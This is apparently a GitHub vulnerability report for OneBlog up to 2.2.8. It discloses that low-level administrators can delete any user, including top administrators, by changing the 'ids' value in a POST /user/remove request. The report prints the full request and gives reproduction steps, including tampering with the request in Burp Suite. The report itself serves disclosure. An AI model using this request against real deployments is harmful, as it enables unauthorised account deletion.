You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).
[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close
ids= 3(The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value)
[Attack Type]
Remote
[Vulnerability details]
first, prepare two test accounts with different levels.
Senior administrator admin
Low level administrator root123
Step 2: log in to the system with root123 and enter the user management page
Step 3: click the delete button to directly delete the administrator user admin
Delete succeeded!
In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)
The first step is to log in to the background with root123 account and enter user management.
Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test
You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.
Delete succeeded!
The text was updated successfully, but these errors were encountered:
[Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
<= 2.2.8
[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close
ids= 3(The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value)
[Attack Type]
Remote
[Vulnerability details]
first, prepare two test accounts with different levels.
Senior administrator admin
Low level administrator root123
Step 2: log in to the system with root123 and enter the user management page
Step 3: click the delete button to directly delete the administrator user admin
Delete succeeded!
In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)
The first step is to log in to the background with root123 account and enter user management.
Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test
You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.
Delete succeeded!
The text was updated successfully, but these errors were encountered: